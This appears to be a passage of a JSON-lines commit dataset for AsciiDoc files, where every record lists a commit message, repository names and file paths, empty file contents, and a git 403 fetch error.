docker-java-sample","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"java\/chapters\/ch03-build-image.adoc","new_file":"java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87627034c46f72c5435835d2f2d8197bc7f2d72c","subject":"draft version of AWS china article","message":"draft version of AWS china article\n","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-8-20-AWS-China.adoc","new_file":"_posts\/2015-8-20-AWS-China.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2365fafb682c4183061501aa04167fff56bdaab","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a9dd8877ed31c4fa2965a0851618cc1700dd61e","subject":"addr-osmify-py: add a readme","message":"addr-osmify-py: add a readme\n","repos":"vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam","old_file":"osm\/addr-osmify-py\/README.adoc","new_file":"osm\/addr-osmify-py\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vmiklos\/vmexam.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55723fc2a9711f19a493ade3ba3f29406b4a93ef","subject":"CNV-11965 for defect 1959287 CPU vendors","message":"CNV-11965 for defect 1959287 CPU vendors\n\nCNV-11965 for defect 1959287 CPU vendors\n\nCNV-11965 for defect 1959287 CPU vendors\n\nCNV-11965 for defect 1959287 CPU vendors\n\nCNV-11965 for defect 1959287\n\nSME\/QE review\n\nedit\n\nsme review\n\nsme review edit\n\npeer review\n\nedit for bullet\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"virt\/install\/preparing-cluster-for-virt.adoc","new_file":"virt\/install\/preparing-cluster-for-virt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12e9d6382e01b54c98a537883312a251ee73b33e","subject":"Update 2016-02-18-XML-Prague-2016-Review.adoc","message":"Update 2016-02-18-XML-Prague-2016-Review.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-XML-Prague-2016-Review.adoc","new_file":"_posts\/2016-02-18-XML-Prague-2016-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1640b5aa2a337e114a2c875027aab533e6cb27d9","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1227c8e88c39cfc3688be643e76ff0146661c9c6","subject":"Update 2018-06-24-Laravel.adoc","message":"Update 2018-06-24-Laravel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-Laravel.adoc","new_file":"_posts\/2018-06-24-Laravel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaf222102d6b4be8340dff319674c2687be1c12b","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3811b7622c286511491d303141df6646ff4ddb5","subject":"Started the ide setup doc with instructions for vscode (#87)","message":"Started the ide setup doc with instructions for vscode (#87)\n\n* started the ide setup doc for vscode\r\n\r\nSigned-off-by: Shoubhik <4640c91dc0094b6cebec7c1a9ac3df9bcd448798@dhcp35-156.lab.eng.blr.redhat.com>\r\n\r\nIDE Setup doc started with fixed filename\r\n\r\nSigned-off-by: Shoubhik <4640c91dc0094b6cebec7c1a9ac3df9bcd448798@dhcp35-156.lab.eng.blr.redhat.com>\r\n\r\n* Improve vscode instructions\r\n\r\n* Add link to plugin readme\r\n","repos":"ldimaggi\/almighty-core,ldimaggi\/almighty-core,ldimaggi\/almighty-core,ldimaggi\/almighty-core,ALMighty\/almighty-core","old_file":"docs\/development\/ide-setup.adoc","new_file":"docs\/development\/ide-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ldimaggi\/almighty-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78feb330095d83f9dbbb566159573f63c38fd94b","subject":"KUDU-1733. Update consistency semantics doc","message":"KUDU-1733. Update consistency semantics doc\n\nChange-Id: I5a59315e70531c8904470c026030f4cc2107ca5b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5605\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\n","repos":"cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu","old_file":"docs\/transaction_semantics.adoc","new_file":"docs\/transaction_semantics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"370c5e4ef4bde073367a4806f63d047233105835","subject":"Update 2014-01-04-1-an-a-Lateral-Thoughts.adoc","message":"Update 2014-01-04-1-an-a-Lateral-Thoughts.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2014-01-04-1-an-a-Lateral-Thoughts.adoc","new_file":"_posts\/2014-01-04-1-an-a-Lateral-Thoughts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64f76d8e1e6857e2e2663a1b74d2c4de3ce6699d","subject":"Update 2016-08-24-Faster-acceptance-tests.adoc","message":"Update 2016-08-24-Faster-acceptance-tests.adoc","repos":"ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog","old_file":"_posts\/2016-08-24-Faster-acceptance-tests.adoc","new_file":"_posts\/2016-08-24-Faster-acceptance-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciena-blueplanet\/developers.blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"958fab1a97c290e13b5ae4671c3607a184b2a977","subject":"Update 2017-02-07-Managing-docker-compose.adoc","message":"Update 2017-02-07-Managing-docker-compose.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Managing-docker-compose.adoc","new_file":"_posts\/2017-02-07-Managing-docker-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3af365aab6c50aea234ec7a66ad15c700b1c941d","subject":"Style change","message":"Style change\n","repos":"lafent\/grunt-and-done","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lafent\/grunt-and-done.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29adf0b074859996775ad15bebf8391f9ef6a12f","subject":"Change status badge to 'shield'","message":"Change status badge to 'shield'\n","repos":"tlocke\/pg8000","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tlocke\/pg8000.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"fd976ff3648859e47d2a6a566b9787bc8443f396","subject":"Gradle plugin in README","message":"Gradle plugin in README\n","repos":"cthiebaud\/jaxrs-analyzer,sdaschner\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"827f30c1111560baa147cb0941e539ac4aa408a4","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"589bc22c3906e757f88bdf6462c637d48256cd07","subject":"Update 2019-11-21-CREATE-NEW-POST-ON-2311-oyl.adoc","message":"Update 2019-11-21-CREATE-NEW-POST-ON-2311-oyl.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-21-CREATE-NEW-POST-ON-2311-oyl.adoc","new_file":"_posts\/2019-11-21-CREATE-NEW-POST-ON-2311-oyl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"866f95859c55d02431c49ae4b7ae194df15d8001","subject":"Adding 1.8 Beta1 release announcement","message":"Adding 1.8 Beta1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-11-30-debezium-1.8-beta1-released.adoc","new_file":"_posts\/2021-11-30-debezium-1.8-beta1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"13f7d41e989bc97993e7fd80e8e21744450cfac9","subject":"1.2.1.Final release announcement","message":"1.2.1.Final release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-07-16-debezium-1-2-1-final-released.adoc","new_file":"blog\/2020-07-16-debezium-1-2-1-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78d34dc16a12e9643b521899459f13e9d8cd89d1","subject":"y2b create post The iPhone 4 \\\/ 4S Metallic","message":"y2b create post The iPhone 4 \\\/ 4S Metallic","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-29-The-iPhone-4--4S-Metallic.adoc","new_file":"_posts\/2011-10-29-The-iPhone-4--4S-Metallic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf09267df94f4984a283b1bc6f9e457d8f3bd542","subject":"new form for fud-5","message":"new form for fud-5\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5.adoc","new_file":"_posts\/2017-09-01-fud5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d90733bd0cf8b41c64956f4bc1866fc1d52e2ae","subject":"Update 2017-01-18-I-wonder.adoc","message":"Update 2017-01-18-I-wonder.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-01-18-I-wonder.adoc","new_file":"_posts\/2017-01-18-I-wonder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19fe69217626ceeee9cf44df94aeae089cc7787c","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef4efff830e2c2c5ad82e34d7f64dca6c6e88942","subject":"y2b create post iPhone Is The Most Successful Product Ever","message":"y2b create post iPhone Is The Most Successful Product Ever","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-30-iPhone-Is-The-Most-Successful-Product-Ever.adoc","new_file":"_posts\/2017-09-30-iPhone-Is-The-Most-Successful-Product-Ever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dcd4fdc3ec4aaa2a6e245da4b861ff59ddfc712","subject":"Hawkular Metrics - Roadmap 2016","message":"Hawkular Metrics - Roadmap 2016\n","repos":"jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/03\/16\/hawkular-metrics-roadmap.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/03\/16\/hawkular-metrics-roadmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b69d50241005058fd298338df3aa319e77253968","subject":"Update 2019-03-21-Using-Docker-Container.adoc","message":"Update 2019-03-21-Using-Docker-Container.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2019-03-21-Using-Docker-Container.adoc","new_file":"_posts\/2019-03-21-Using-Docker-Container.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae724d4c49a70015fd1cc12255bc47752df0cac6","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d57f82611bceaf0d2b1cb29ceb2f834ef7675368","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c30871db2417bcd4dd20062f92101bbd5ee4004","subject":"Update 2016-07-22-Presentations.adoc","message":"Update 2016-07-22-Presentations.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-22-Presentations.adoc","new_file":"_posts\/2016-07-22-Presentations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45ec5bc153c71f0277302f36ec1405d95079684c","subject":"First proposition draft for functional fundations of Reactivity.","message":"First proposition draft for functional fundations of Reactivity.\n","repos":"reactivity-io\/reactivity-doc","old_file":"functional-fundations.adoc","new_file":"functional-fundations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reactivity-io\/reactivity-doc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d11053928163f21f39c1b35ab45070c2380cdf5b","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21093eb56f83c063aa8a6cbd717828229db3e881","subject":"write(note): Add Editor's note","message":"write(note): Add Editor's note\n","repos":"charlenopires\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,liubin\/promises-book,genie88\/promises-book,genie88\/promises-book,cqricky\/promises-book,wenber\/promises-book,sunfurong\/promise,sunfurong\/promise,sunfurong\/promise,tangjinzhou\/promises-book,azu\/promises-book,oToUC\/promises-book,dieface\/promises-book,wenber\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,cqricky\/promises-book,mzbac\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,xifeiwu\/promises-book,purepennons\/promises-book,oToUC\/promises-book,lidasong2014\/promises-book,azu\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,liyunsheng\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,wenber\/promises-book,mzbac\/promises-book,oToUC\/promises-book,azu\/promises-book,azu\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,liyunsheng\/promises-book,mzbac\/promises-book,cqricky\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,xifeiwu\/promises-book","old_file":"Appendix-Note\/readme.adoc","new_file":"Appendix-Note\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3af4645064995ab4dfc150259edce3beb75e5b9","subject":"Update 2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","message":"Update 2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","repos":"andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io","old_file":"_posts\/2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","new_file":"_posts\/2016-10-09-Reflections-Code-Coverage-and-a-lot-of-Headache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreassiegelrfid\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc03d1959d5fc1eb6289ae19c1184ddd96238c2c","subject":"Deleted _posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Deleted _posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9241765ba26008cc6238d62bbb5f68d4c94f2201","subject":"CNV 10760 Corrections after initial changes failed QA testing","message":"CNV 10760 Corrections after initial changes failed QA testing\n\nCNV 10760 Changes following QE review 2\n\nCNV 10760 More QE Review 2 changes\n\nCNV 10760 Additional QE Review 2 changes\n\nCNV 10760 Additional Changes based on peer review\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/virt-attaching-vm-secondary-network-cli.adoc","new_file":"modules\/virt-attaching-vm-secondary-network-cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75a902e2d8e0a070368f440bdcb74f15935838c9","subject":"Update 2017-05-10-Episode-98-Clear-the-Field.adoc","message":"Update 2017-05-10-Episode-98-Clear-the-Field.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-05-10-Episode-98-Clear-the-Field.adoc","new_file":"_posts\/2017-05-10-Episode-98-Clear-the-Field.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a1929027a9fbfc7cb1f05582d06cf88d532df00","subject":"release notes","message":"release notes\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d69b954d48281a2e52dafdaaff2b2a19602788e3","subject":"Update 2017-07-20-Alphaskades-Blog.adoc","message":"Update 2017-07-20-Alphaskades-Blog.adoc","repos":"alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io","old_file":"_posts\/2017-07-20-Alphaskades-Blog.adoc","new_file":"_posts\/2017-07-20-Alphaskades-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alphaskade\/alphaskade.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cabe1839aa62deb076b80c91d6352fa685e2e30c","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81c5efa8452464810110b27b823ebab61cf4d4ba","subject":"Create 